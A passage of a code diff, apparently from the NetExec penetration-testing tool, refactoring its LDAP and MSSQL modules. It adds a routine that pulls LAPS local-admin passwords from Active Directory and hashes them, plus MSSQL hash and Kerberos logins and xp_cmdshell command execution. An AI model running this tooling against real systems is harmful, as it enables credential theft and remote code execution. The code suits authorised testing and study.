f"{self.domain}\\{self.username}:{process_secret(self.password)} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
|
||||
color="magenta" if error_code in ldap_error_status else "red",
|
||||
)
|
||||
return False
|
||||
else:
|
||||
error_code = str(e).split()[-2][:-1]
|
||||
self.logger.fail(
|
||||
f"{self.domain}\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('nxc', 'audit_mode') else self.config.get('nxc', 'audit_mode') * 8)} {error_code!s}",
|
||||
f"{self.domain}\\{self.username}{' from ccache' if useCache else ':%s' % (process_secret(kerb_pass))} {error_code!s}",
|
||||
color="magenta" if error_code in ldap_error_status else "red",
|
||||
)
|
||||
return False
|
||||
|
@ -525,18 +525,18 @@ class ldap(connection):
|
|||
except Exception as e:
|
||||
error_code = str(e).split()[-2][:-1]
|
||||
self.logger.fail(
|
||||
f"{self.domain}\\{self.username}:{self.password if not self.config.get('nxc', 'audit_mode') else self.config.get('nxc', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
|
||||
f"{self.domain}\\{self.username}:{process_secret(self.password)} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
|
||||
color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red",
|
||||
)
|
||||
else:
|
||||
error_code = str(e).split()[-2][:-1]
|
||||
self.logger.fail(
|
||||
f"{self.domain}\\{self.username}:{self.password if not self.config.get('nxc', 'audit_mode') else self.config.get('nxc', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
|
||||
f"{self.domain}\\{self.username}:{process_secret(self.password)} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
|
||||
color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red",
|
||||
)
|
||||
return False
|
||||
except OSError as e:
|
||||
self.logger.fail(f"{self.domain}\\{self.username}:{self.password if not self.config.get('nxc', 'audit_mode') else self.config.get('nxc', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}")
|
||||
self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(self.password)} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}")
|
||||
return False
|
||||
|
||||
def hash_login(self, domain, username, ntlm_hash):
|
||||
|
@ -618,18 +618,18 @@ class ldap(connection):
|
|||
except ldap_impacket.LDAPSessionError as e:
|
||||
error_code = str(e).split()[-2][:-1]
|
||||
self.logger.fail(
|
||||
f"{self.domain}\\{self.username}:{nthash if not self.config.get('nxc', 'audit_mode') else self.config.get('nxc', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
|
||||
f"{self.domain}\\{self.username}:{process_secret(nthash)} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
|
||||
color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red",
|
||||
)
|
||||
else:
|
||||
error_code = str(e).split()[-2][:-1]
|
||||
self.logger.fail(
|
||||
f"{self.domain}\\{self.username}:{nthash if not self.config.get('nxc', 'audit_mode') else self.config.get('nxc', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
|
||||
f"{self.domain}\\{self.username}:{process_secret(nthash)} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
|
||||
color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red",
|
||||
)
|
||||
return False
|
||||
except OSError as e:
|
||||
self.logger.fail(f"{self.domain}\\{self.username}:{self.password if not self.config.get('nxc', 'audit_mode') else self.config.get('nxc', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}")
|
||||
self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(self.password)} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}")
|
||||
return False
|
||||
|
||||
def create_smbv1_conn(self):
|
||||
|
|
|
@ -1,3 +1,6 @@
|
|||
import binascii
|
||||
import hashlib
|
||||
from json import loads
|
||||
from pyasn1.codec.der import decoder
|
||||
from pyasn1_modules import rfc5652
|
||||
|
||||
|
@ -258,3 +261,106 @@ class LAPSv2Extract:
|
|||
plaintext = decrypt_plaintext(cek, iv, remaining)
|
||||
self.logger.info(plaintext[:-18].decode("utf-16le"))
|
||||
return plaintext[:-18].decode("utf-16le")
|
||||
|
||||
|
||||
def laps_search(self, username, password, cred_type, domain):
|
||||
prev_protocol = self.logger.extra["protocol"]
|
||||
prev_port = self.logger.extra["port"]
|
||||
self.logger.extra["protocol"] = "LDAP"
|
||||
self.logger.extra["port"] = "389"
|
||||
|
||||
ldapco = LDAPConnect(self.domain, "389", self.domain)
|
||||
|
||||
if self.kerberos:
|
||||
if self.kdcHost is None:
|
||||
self.logger.fail("Add --kdcHost parameter to use laps with kerberos")
|
||||
return None, None, None, None
|
||||
|
||||
connection = ldapco.kerberos_login(
|
||||
domain[0],
|
||||
username[0] if username else "",
|
||||
password[0] if cred_type[0] == "plaintext" else "",
|
||||
password[0] if cred_type[0] == "hash" else "",
|
||||
kdcHost=self.kdcHost,
|
||||
aesKey=self.aesKey,
|
||||
)
|
||||
else:
|
||||
connection = ldapco.auth_login(
|
||||
domain[0],
|
||||
username[0] if username else "",
|
||||
password[0] if cred_type[0] == "plaintext" else "",
|
||||
password[0] if cred_type[0] == "hash" else "",
|
||||
)
|
||||
if not connection:
|
||||
self.logger.fail(f"LDAP connection failed with account {username[0]}")
|
||||
|
||||
return None, None, None, None
|
||||
|
||||
search_filter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.hostname + "))"
|
||||
attributes = [
|
||||
"msLAPS-EncryptedPassword",
|
||||
"msLAPS-Password",
|
||||
"ms-MCS-AdmPwd",
|
||||
"sAMAccountName",
|
||||
]
|
||||
results = connection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)
|
||||
|
||||
msMCSAdmPwd = ""
|
||||
sAMAccountName = ""
|
||||
username_laps = ""
|
||||
|
||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||
|
||||
results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)]
|
||||
if len(results) != 0:
|
||||
for host in results:
|
||||
values = {str(attr["type"]).lower(): attr["vals"][0] for attr in host["attributes"]}
|
||||
if "mslaps-encryptedpassword" in values:
|
||||
msMCSAdmPwd = values["mslaps-encryptedpassword"]
|
||||
d = LAPSv2Extract(
|
||||
bytes(msMCSAdmPwd),
|
||||
username[0] if username else "",
|
||||
password[0] if cred_type[0] == "plaintext" else "",
|
||||
domain[0],
|
||||
password[0] if cred_type[0] == "hash" else "",
|
||||
self.args.kerberos,
|
||||
self.args.kdcHost,
|
||||
339
|
||||
)
|
||||
try:
|
||||
data = d.run()
|
||||
except Exception as e:
|
||||
self.logger.fail(str(e))
|
||||
return None, None, None, None
|
||||
r = loads(data)
|
||||
msMCSAdmPwd = r["p"]
|
||||
username_laps = r["n"]
|
||||
elif "mslaps-password" in values:
|
||||
r = loads(str(values["mslaps-password"]))
|
||||
msMCSAdmPwd = r["p"]
|
||||
username_laps = r["n"]
|
||||
elif "ms-mcs-admpwd" in values:
|
||||
msMCSAdmPwd = str(values["ms-mcs-admpwd"])
|
||||
else:
|
||||
self.logger.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password")
|
||||
self.logger.debug(f"Host: {sAMAccountName:<20} Password: {msMCSAdmPwd} {self.hostname}")
|
||||
else:
|
||||
self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}")
|
||||
return None, None, None, None
|
||||
|
||||
if msMCSAdmPwd == "":
|
||||
self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}")
|
||||
return None, None, None, None
|
||||
|
||||
hash_ntlm = None
|
||||
if cred_type[0] == "hash":
|
||||
hash_ntlm = hashlib.new("md4", msMCSAdmPwd.encode("utf-16le")).digest()
|
||||
hash_ntlm = binascii.hexlify(hash_ntlm).decode()
|
||||
|
||||
username = username_laps if username_laps else self.args.laps
|
||||
password = msMCSAdmPwd
|
||||
domain = self.hostname
|
||||
self.args.local_auth = True
|
||||
self.logger.extra["protocol"] = prev_protocol
|
||||
self.logger.extra["port"] = prev_port
|
||||
return username, password, domain, hash_ntlm
|
||||
|
|
|
@ -1,15 +1,19 @@
|
|||
import os
|
||||
import random
|
||||
import socket
|
||||
import contextlib
|
||||
|
||||
from nxc.config import process_secret
|
||||
from nxc.connection import connection
|
||||
from nxc.connection import requires_admin
|
||||
from nxc.logger import NXCAdapter
|
||||
from nxc.protocols.mssql.mssqlexec import MSSQLEXEC
|
||||
from nxc.helpers.bloodhound import add_user_bh
|
||||
from nxc.helpers.ntlm_parser import parse_challenge
|
||||
from nxc.helpers.powershell import create_ps_command
|
||||
from impacket import tds
|
||||
from nxc.protocols.mssql.mssqlexec import MSSQLEXEC
|
||||
|
||||
from impacket import tds, ntlm
|
||||
from impacket.krb5.ccache import CCache
|
||||
from impacket.smbconnection import SMBConnection, SessionError
|
||||
from impacket.tds import (
|
||||
SQLErrorException,
|
||||
TDS_LOGINACK_TOKEN,
|
||||
|
@ -22,31 +26,20 @@ from impacket.tds import (
|
|||
TDS_ENVCHANGE_CHARSET,
|
||||
TDS_ENVCHANGE_PACKETSIZE,
|
||||
)
|
||||
import contextlib
|
||||
|
||||
|
||||
class mssql(connection):
|
||||
def __init__(self, args, db, host):
|
||||
self.mssql_instances = None
|
||||
self.mssql_instances = []
|
||||
self.domain = None
|
||||
self.server_os = None
|
||||
self.hash = None
|
||||
self.os_arch = None
|
||||
self.nthash = ""
|
||||
self.is_mssql = False
|
||||
|
||||
connection.__init__(self, args, db, host)
|
||||
|
||||
def proto_flow(self):
|
||||
self.proto_logger()
|
||||
if self.create_conn_obj():
|
||||
self.enum_host_info()
|
||||
self.print_host_info()
|
||||
if self.login():
|
||||
if hasattr(self.args, "module") and self.args.module:
|
||||
self.call_modules()
|
||||
else:
|
||||
self.call_cmd_args()
|
||||
|
||||
def proto_logger(self):
|
||||
self.logger = NXCAdapter(
|
||||
extra={
|
||||
|
@ -57,83 +50,98 @@ class mssql(connection):
|
|||
}
|
||||
)
|
||||
|
||||
def enum_host_info(self):
|
||||
# this try pass breaks module http server, more info https://github.com/byt3bl33d3r/CrackMapExec/issues/363
|
||||
try: # noqa: SIM105
|
||||
# Probably a better way of doing this, grab our IP from the socket
|
||||
self.local_ip = str(self.conn.socket).split()[2].split("=")[1].split(":")[0]
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if self.args.no_smb:
|
||||
self.domain = self.args.domain
|
||||
else:
|
||||
try:
|
||||
smb_conn = SMBConnection(self.host, self.host, None)
|
||||
try:
|
||||
smb_conn.login("", "")
|
||||
except SessionError as e:
|
||||
if "STATUS_ACCESS_DENIED" in e.getErrorString():
|
||||
pass
|
||||
|
||||
self.domain = smb_conn.getServerDNSDomainName()
|
||||
self.hostname = smb_conn.getServerName()
|
||||
self.server_os = smb_conn.getServerOS()
|
||||
self.logger.extra["hostname"] = self.hostname
|
||||
|
||||
with contextlib.suppress(Exception):
|
||||
smb_conn.logoff()
|
||||
|
||||
if self.args.domain:
|
||||
self.domain = self.args.domain
|
||||
|
||||
if self.args.local_auth:
|
||||
self.domain = self.hostname
|
||||
except Exception as e:
|
||||
self.logger.fail(f"Error retrieving host domain: {e} specify one manually with the '-d' flag")
|
||||
|
||||
self.mssql_instances = self.conn.getInstances(0)
|
||||
self.db.add_host(
|
||||
self.host,
|
||||
self.hostname,
|
||||
self.domain,
|
||||
self.server_os,
|
||||
len(self.mssql_instances),
|
||||
)
|
||||
|
||||
with contextlib.suppress(Exception):
|
||||
self.conn.disconnect()
|
||||
|
||||
def print_host_info(self):
|
||||
self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})")
|
||||
# if len(self.mssql_instances) > 0:
|
||||
# for i, instance in enumerate(self.mssql_instances):
|
||||
# for key in instance.keys():
|
||||
|
||||
def create_conn_obj(self):
|
||||
try:
|
||||
self.conn = tds.MSSQL(self.host, self.port)
|
||||
self.conn.connect()
|
||||
except OSError as e:
|
||||
self.logger.debug(f"Error connecting to MSSQL: {e}")
|
||||
# Default has not timeout option in tds.MSSQL.connect() function, let rewrite it.
|
||||
af, socktype, proto, canonname, sa = socket.getaddrinfo(self.host, self.port, 0, socket.SOCK_STREAM)[0]
|
||||
sock = socket.socket(af, socktype, proto)
|
||||
sock.settimeout(self.args.mssql_timeout)
|
||||
sock.connect(sa)
|
||||
self.conn.socket = sock
|
||||
if not self.is_mssql:
|
||||
self.conn.preLogin()
|
||||
except Exception as e:
|
||||
self.logger.debug(f"Error connecting to MSSQL service on host: {self.host}, reason: {e}")
|
||||
return False
|
||||
return True
|
||||
else:
|
||||
self.is_mssql = True
|
||||
return True
|
||||
|
||||
def reconnect_mssql(func):
|
||||
def wrapper(self, *args, **kwargs):
|
||||
with contextlib.suppress(Exception):
|
||||
self.conn.disconnect()
|
||||
# When using ccache file, we must need to set target host to hostname when creating connection object.
|
||||
if self.kerberos:
|
||||
self.host = self.hostname
|
||||
self.create_conn_obj()
|
||||
return func(self, *args, **kwargs)
|
||||
return wrapper
|
||||
|
||||
def check_if_admin(self):
|
||||
self.admin_privs = False
|
||||
try:
|
||||
results = self.conn.sql_query("SELECT IS_SRVROLEMEMBER('sysadmin')")
|
||||
is_admin = int(results[0][""])
|
||||
except Exception as e:
|
||||
self.logger.fail(f"Error querying for sysadmin role: {e}")
|
||||
return False
|
||||
|
||||
if is_admin:
|
||||
self.admin_privs = True
|
||||
self.logger.debug("User is admin")
|
||||
else:
|
||||
if is_admin:
|
||||
self.admin_privs = True
|
||||
|
||||
@reconnect_mssql
|
||||
def enum_host_info(self):
|
||||
challenge = None
|
||||
try:
|
||||
login = tds.TDS_LOGIN()
|
||||
login["HostName"] = ""
|
||||
login["AppName"] = ""
|
||||
login["ServerName"] = self.conn.server.encode("utf-16le")
|
||||
login["CltIntName"] = login["AppName"]
|
||||
login["ClientPID"] = random.randint(0, 1024)
|
||||
login["PacketSize"] = self.conn.packetSize
|
||||
login["OptionFlags2"] = tds.TDS_INIT_LANG_FATAL | tds.TDS_ODBC_ON | tds.TDS_INTEGRATED_SECURITY_ON
|
||||
|
||||
# NTLMSSP Negotiate
|
||||
auth = ntlm.getNTLMSSPType1("", "")
|
||||
login["SSPI"] = auth.getData()
|
||||
login["Length"] = len(login.getData())
|
||||
|
||||
# Get number of mssql instance
|
||||
self.mssql_instances = self.conn.getInstances(0)
|
||||
|
||||
# Send the NTLMSSP Negotiate or SQL Auth Packet
|
||||
self.conn.sendTDS(tds.TDS_LOGIN7, login.getData())
|
||||
|
||||
tdsx = self.conn.recvTDS()
|
||||
challenge = tdsx["Data"][3:]
|
||||
self.logger.info(f"NTLM challenge: {challenge!s}")
|
||||
except Exception as e:
|
||||
self.logger.info(f"Failed to receive NTLM challenge, reason: {e!s}")
|
||||
return False
|
||||
else:
|
||||
ntlm_info = parse_challenge(challenge)
|
||||
self.domain = ntlm_info["domain"]
|
||||
self.hostname = ntlm_info["hostname"]
|
||||
self.server_os = ntlm_info["os_version"]
|
||||
self.logger.extra["hostname"] = self.hostname
|
||||
self.db.add_host(self.host, self.hostname, self.domain, self.server_os, len(self.mssql_instances),)
|
||||
|
||||
if self.args.domain:
|
||||
self.domain = self.args.domain
|
||||
|
||||
if self.args.local_auth:
|
||||
self.domain = self.hostname
|
||||
|
||||
if self.domain is None:
|
||||
self.domain = ""
|
||||
|
||||
def print_host_info(self):
|
||||
self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})")
|
||||
return True
|
||||
|
||||
@reconnect_mssql
|
||||
def kerberos_login(
|
||||
self,
|
||||
domain,
|
||||
|
@ -144,146 +152,126 @@ class mssql(connection):
|
|||
kdcHost="",
|
||||
useCache=False,
|
||||
):
|
||||
with contextlib.suppress(Exception):
|
||||
self.conn.disconnect()
|
||||
self.create_conn_obj()
|
||||
|
||||
self.username = username
|
||||
self.password = password
|
||||
self.domain = domain
|
||||
self.nthash = ""
|
||||
hashes = None
|
||||
if ntlm_hash != "":
|
||||
if ntlm_hash:
|
||||
if ntlm_hash.find(":") != -1:
|
||||
hashes = ntlm_hash
|
||||
ntlm_hash.split(":")[1]
|
||||
self.nthash = ntlm_hash.split(":")[1]
|
||||
hashes = f":{self.nthash}"
|
||||
else:
|
||||
# only nt hash
|
||||
hashes = f":{ntlm_hash}"
|
||||
self.nthash = ntlm_hash
|
||||
hashes = f":{self.nthash}"
|
||||
|
||||
kerb_pass = next(s for s in [self.nthash, password, aesKey] if s) if not all(s == "" for s in [self.nthash, password, aesKey]) else ""
|
||||
|
||||
if useCache and kerb_pass == "":
|
||||
ccache = CCache.loadFile(os.getenv("KRB5CCNAME"))
|
||||
username = ccache.credentials[0].header["client"].prettyPrint().decode().split("@")[0]
|
||||
self.username = username
|
||||
|
||||
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
|
||||
|
||||
try:
|
||||
res = self.conn.kerberosLogin(
|
||||
None,
|
||||
username,
|
||||
password,
|
||||
domain,
|
||||
self.username,
|
||||
self.password,
|
||||
self.domain,
|
||||
hashes,
|
||||
aesKey,
|
||||
kdcHost=kdcHost,
|
||||
useCache=useCache,
|
||||
)
|
||||
if res is not True:
|
||||
self.conn.printReplies()
|
||||
return False
|
||||
|
||||
self.password = password
|
||||
if username == "" and useCache:
|
||||
ccache = CCache.loadFile(os.getenv("KRB5CCNAME"))
|
||||
principal = ccache.principal.toPrincipal()
|
||||
self.username = principal.components[0]
|
||||
username = principal.components[0]
|
||||
else:
|
||||
self.username = username
|
||||
self.domain = domain
|
||||
raise
|
||||
self.check_if_admin()
|
||||
|
||||
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
|
||||
domain = f"{domain}\\" if not self.args.local_auth else ""
|
||||
|
||||
self.logger.success(f"{domain}{username}{used_ccache} {self.mark_pwned()}")
|
||||
self.logger.success(f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}")
|
||||
if not self.args.local_auth:
|
||||
add_user_bh(self.username, self.domain, self.logger, self.config)
|
||||
if self.admin_privs:
|
||||
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
|
||||
return True
|
||||
except Exception as e:
|
||||
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
|
||||
domain = f"{domain}\\" if not self.args.local_auth else ""
|
||||
self.logger.fail(f"{domain}\\{username}{used_ccache} {e}")
|
||||
return False
|
||||
|
||||
def plaintext_login(self, domain, username, password):
|
||||
with contextlib.suppress(Exception):
|
||||
self.conn.disconnect()
|
||||
self.create_conn_obj()
|
||||
|
||||
try:
|
||||
# this is to prevent a decoding issue in impacket/ntlm.py:617 where it attempts to decode the domain
|
||||
if not domain:
|
||||
domain = ""
|
||||
res = self.conn.login(None, username, password, domain, None, not self.args.local_auth)
|
||||
if res is not True:
|
||||
self.handle_mssql_reply()
|
||||
return False
|
||||
|
||||
self.password = password
|
||||
self.username = username
|
||||
self.domain = domain
|
||||
self.check_if_admin()
|
||||
self.db.add_credential("plaintext", domain, username, password)
|
||||
|
||||
if self.admin_privs:
|
||||
self.db.add_admin_user("plaintext", domain, username, password, self.host)
|
||||
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
|
||||
|
||||
domain = f"{domain}\\" if not self.args.local_auth else ""
|
||||
out = f"{domain}{username}:{process_secret(password)} {self.mark_pwned()}"
|
||||
self.logger.success(out)
|
||||
if not self.args.local_auth:
|
||||
add_user_bh(self.username, self.domain, self.logger, self.config)
|
||||
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)
|
||||
return True
|
||||
except BrokenPipeError:
|
||||
self.logger.fail("Broken Pipe Error while attempting to login")
|
||||
return False
|
||||
except Exception as e:
|
||||
self.logger.fail(f"{domain}\\{username}:{process_secret(password)}")
|
||||
self.logger.exception(e)
|
||||
except Exception:
|
||||
error_msg = self.handle_mssql_reply()
|
||||
self.logger.fail("{}\\{}:{} {}".format(self.domain, self.username, kerb_pass, error_msg if error_msg else ""))
|
||||
return False
|
||||
|
||||
@reconnect_mssql
|
||||
def plaintext_login(self, domain, username, password):
|
||||
self.password = password
|
||||
self.username = username
|
||||
self.domain = domain
|
||||
|
||||
try:
|
||||
res = self.conn.login(
|
||||
None,
|
||||
self.username,
|
||||
self.password,
|
||||
self.domain,
|
||||
None,
|
||||
not self.args.local_auth,
|
||||
)
|
||||
if res is not True:
|
||||
raise
|
||||
self.check_if_admin()
|
||||
out = f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
|
||||
self.logger.success(out)
|
||||
if not self.args.local_auth:
|
||||
add_user_bh(self.username, self.domain, self.logger, self.config)
|
||||
if self.admin_privs:
|
||||
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)
|
||||
return True
|
||||
except BrokenPipeError:
|
||||
self.logger.fail("Broken Pipe Error while attempting to login")
|
||||
return False
|
||||
except Exception:
|
||||
error_msg = self.handle_mssql_reply()
|
||||
self.logger.fail("{}\\{}:{} {}".format(self.domain, self.username, process_secret(self.password), error_msg if error_msg else ""))
|
||||
return False
|
||||
|
||||
@reconnect_mssql
|
||||
def hash_login(self, domain, username, ntlm_hash):
|
||||
lmhash = ""
|
||||
nthash = ""
|
||||
|
||||
# This checks to see if we didn't provide the LM Hash
|
||||
self.username = username
|
||||
self.domain = domain
|
||||
self.lmhash = ""
|
||||
self.nthash = ""
|
||||
|
||||
if ntlm_hash.find(":") != -1:
|
||||
lmhash, nthash = ntlm_hash.split(":")
|
||||
self.lmhash, self.nthash = ntlm_hash.split(":")
|
||||
else:
|
||||
nthash = ntlm_hash
|
||||
|
||||
with contextlib.suppress(Exception):
|
||||
self.conn.disconnect()
|
||||
self.create_conn_obj()
|
||||
self.nthash = ntlm_hash
|
||||
|
||||
try:
|
||||
res = self.conn.login(
|
||||
None,
|
||||
username,
|
||||
self.username,
|
||||
"",
|
||||
domain,
|
||||
":" + nthash if not lmhash else ntlm_hash,
|
||||
self.domain,
|
||||
f"{self.lmhash}:{self.nthash}",
|
||||
not self.args.local_auth,
|
||||
)
|
||||
if res is not True:
|
||||
self.conn.printReplies()
|
||||
return False
|
||||
|
||||
self.hash = ntlm_hash
|
||||
self.username = username
|
||||
self.domain = domain
|
||||
raise
|
||||
self.check_if_admin()
|
||||
self.db.add_credential("hash", domain, username, ntlm_hash)
|
||||
|
||||
if self.admin_privs:
|
||||
self.db.add_admin_user("hash", domain, username, ntlm_hash, self.host)
|
||||
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
|
||||
|
||||
out = f"{domain}\\{username} {process_secret(ntlm_hash)} {self.mark_pwned()}"
|
||||
out = f"{self.domain}\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}"
|
||||
self.logger.success(out)
|
||||
if not self.args.local_auth:
|
||||
add_user_bh(self.username, self.domain, self.logger, self.config)
|
||||
if self.admin_privs:
|
||||
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)
|
||||
return True
|
||||
except BrokenPipeError:
|
||||
self.logger.fail("Broken Pipe Error while attempting to login")
|
||||
return False
|
||||
except Exception as e:
|
||||
self.logger.fail(f"{domain}\\{username}:{process_secret(ntlm_hash)} {e}")
|
||||
except Exception:
|
||||
error_msg = self.handle_mssql_reply()
|
||||
self.logger.fail("{}\\{}:{} {}".format(self.domain, self.username, process_secret(self.nthash), error_msg if error_msg else ""))
|
||||
return False
|
||||
|
||||
def mssql_query(self):
|
||||
|
@ -306,47 +294,39 @@ class mssql(connection):
|
|||
else:
|
||||
self.logger.fail("Unexpected output")
|
||||
except Exception as e:
|
||||
self.logger.exception(e)
|
||||
self.logger.exception(f"Failed to excuted MSSQL query, reason: {e}")
|
||||
return None
|
||||
|
||||
return raw_output
|
||||
|
||||
@requires_admin
|
||||
def execute(self, payload=None, print_output=False):
|
||||
def execute(self, payload=None, get_output=False):
|
||||
if not payload and self.args.execute:
|
||||
payload = self.args.execute
|
||||
|
||||
self.logger.info(f"Command to execute:\n{payload}")
|
||||
if not self.args.no_output:
|
||||
get_output = True
|
||||
|
||||
self.logger.info(f"Command to execute: {payload}")
|
||||
try:
|
||||
exec_method = MSSQLEXEC(self.conn)
|
||||
raw_output = exec_method.execute(payload, print_output)
|
||||
self.logger.info("Executed command via mssqlexec")
|
||||
self.logger.debug(f"Raw output: {raw_output}")
|
||||
exec_method = MSSQLEXEC(self.conn, self.logger)
|
||||
raw_output = exec_method.execute(payload, get_output)
|
||||
except Exception as e:
|
||||
self.logger.exception(e)
|
||||
return None
|
||||
|
||||
if hasattr(self, "server"):
|
||||
self.server.track_host(self.host)
|
||||
|
||||
if self.args.execute or self.args.ps_execute:
|
||||
self.logger.fail(f"Execute command failed, error: {e!s}")
|
||||
return False
|
||||
else:
|
||||
self.logger.success("Executed command via mssqlexec")
|
||||
if self.args.no_output:
|
||||
self.logger.debug("Output set to disabled")
|
||||
else:
|
||||
if raw_output:
|
||||
for line in raw_output:
|
||||
self.logger.highlight(line)
|
||||
|
||||
return raw_output
|
||||
return raw_output
|
||||
|
||||
@requires_admin
|
||||
def ps_execute(
|
||||
self,
|
||||
payload=None,
|
||||
get_output=False,
|
||||
methods=None,
|
||||
force_ps32=False,
|
||||
dont_obfs=True,
|
||||
dont_obfs=False,
|
||||
):
|
||||
if not payload and self.args.ps_execute:
|
||||
payload = self.args.ps_execute
|
||||
|
@ -364,7 +344,7 @@ class mssql(connection):
|
|||
try:
|
||||
data = f.read()
|
||||
self.logger.display(f"Size is {len(data)} bytes")
|
||||
exec_method = MSSQLEXEC(self.conn)
|
||||
exec_method = MSSQLEXEC(self.conn, self.logger)
|
||||
exec_method.put_file(data, self.args.put_file[1])
|
||||
if exec_method.file_exists(self.args.put_file[1]):
|
||||
self.logger.success("File has been uploaded on the remote machine")
|
||||
|
@ -374,13 +354,13 @@ class mssql(connection):
|
|||
self.logger.fail(f"Error during upload : {e}")
|
||||
|
||||
@requires_admin
|
||||
def get_file(self):
|
||||
def get_file(self):
|
||||
remote_path = self.args.get_file[0]
|
||||
download_path = self.args.get_file[1]
|
||||
self.logger.display(f'Copying "{remote_path}" to "{download_path}"')
|
||||
|
||||
try:
|
||||
exec_method = MSSQLEXEC(self.conn)
|
||||
exec_method = MSSQLEXEC(self.conn, self.logger)
|
||||
exec_method.get_file(self.args.get_file[0], self.args.get_file[1])
|
||||
self.logger.success(f'File "{remote_path}" was downloaded to "{download_path}"')
|
||||
except Exception as e:
|
||||
|
@ -394,13 +374,13 @@ class mssql(connection):
|
|||
for keys in self.conn.replies:
|
||||
for _i, key in enumerate(self.conn.replies[keys]):
|
||||
if key["TokenType"] == TDS_ERROR_TOKEN:
|
||||
error = f"ERROR({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}"
|
||||
error_msg = f"({key['MsgText'].decode('utf-16le')} Please try again with or without '--local-auth')"
|
||||
self.conn.lastError = SQLErrorException(f"ERROR: Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}")
|
||||
self.logger.fail(error)
|
||||
return error_msg
|
||||
elif key["TokenType"] == TDS_INFO_TOKEN:
|
||||
self.logger.display(f"INFO({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}")
|
||||
return f"({key['MsgText'].decode('utf-16le')})"
|
||||
elif key["TokenType"] == TDS_LOGINACK_TOKEN:
|
||||
self.logger.display(f"ACK: Result: {key['Interface']} - {key['ProgName'].decode('utf-16le')} ({key['MajorVer']:d}{key['MinorVer']:d} {key['BuildNumHi']:d}{key['BuildNumLow']:d}) ")
|
||||
return f"(ACK: Result: {key['Interface']} - {key['ProgName'].decode('utf-16le')} ({key['MajorVer']:d}{key['MinorVer']:d} {key['BuildNumHi']:d}{key['BuildNumLow']:d}) )"
|
||||
elif key["TokenType"] == TDS_ENVCHANGE_TOKEN and key["Type"] in (
|
||||
TDS_ENVCHANGE_DATABASE,
|
||||
TDS_ENVCHANGE_LANGUAGE,
|
||||
|
@ -422,4 +402,4 @@ class mssql(connection):
|
|||
_type = "PACKETSIZE"
|
||||
else:
|
||||
_type = f"{key['Type']:d}"
|
||||
self.logger.display(f"ENVCHANGE({_type}): Old Value: {record['OldValue'].decode('utf-16le')}, New Value: {record['NewValue'].decode('utf-16le')}")
|
||||
return f"(ENVCHANGE({_type}): Old Value: {record['OldValue'].decode('utf-16le')}, New Value: {record['NewValue'].decode('utf-16le')})"
|
||||
|
|
|
@ -1,38 +1,38 @@
|
|||
import binascii
|
||||
from nxc.logger import nxc_logger
|
||||
|
||||
|
||||
class MSSQLEXEC:
|
||||
def __init__(self, connection):
|
||||
def __init__(self, connection, logger):
|
||||
self.mssql_conn = connection
|
||||
self.outputBuffer = ""
|
||||
self.logger = logger
|
||||
self.outputBuffer = []
|
||||
|
||||
def execute(self, command, output=False):
|
||||
command_output = []
|
||||
try:
|
||||
self.enable_xp_cmdshell()
|
||||
except Exception as e:
|
||||
nxc_logger.error(f"Error when attempting to enable x_cmdshell: {e}")
|
||||
self.logger.error(f"Error when attempting to enable x_cmdshell: {e}")
|
||||
|
||||
try:
|
||||
result = self.mssql_conn.sql_query(f"exec master..xp_cmdshell '{command}'")
|
||||
nxc_logger.debug(f"SQL Query Result: {result}")
|
||||
for row in result:
|
||||
if row["output"] == "NULL":
|
||||
continue
|
||||
command_output.append(row["output"])
|
||||
except Exception as e:
|
||||
nxc_logger.error(f"Error when attempting to execute command via xp_cmdshell: {e}")
|
||||
